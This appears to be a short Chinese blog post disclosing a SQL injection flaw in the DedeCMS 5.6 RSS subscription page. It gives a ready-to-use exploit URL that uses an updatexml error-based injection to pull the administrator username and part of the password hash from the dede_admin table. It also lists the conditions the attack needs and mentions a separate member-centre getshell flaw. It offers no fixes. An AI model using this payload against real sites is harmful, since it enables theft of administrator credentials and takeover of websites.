dedecms 5.6 RSS订阅页面注入漏洞

发表评论 (0) 查看评论

EXP:

uploads/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1

利用环境:

GPC off
有updatexml函数

测试:
请关闭会员注册,会员中心存在getshell漏洞

http://t00ls.net/thread-10026-1-1.html

发表评论?

0 条评论。

发表评论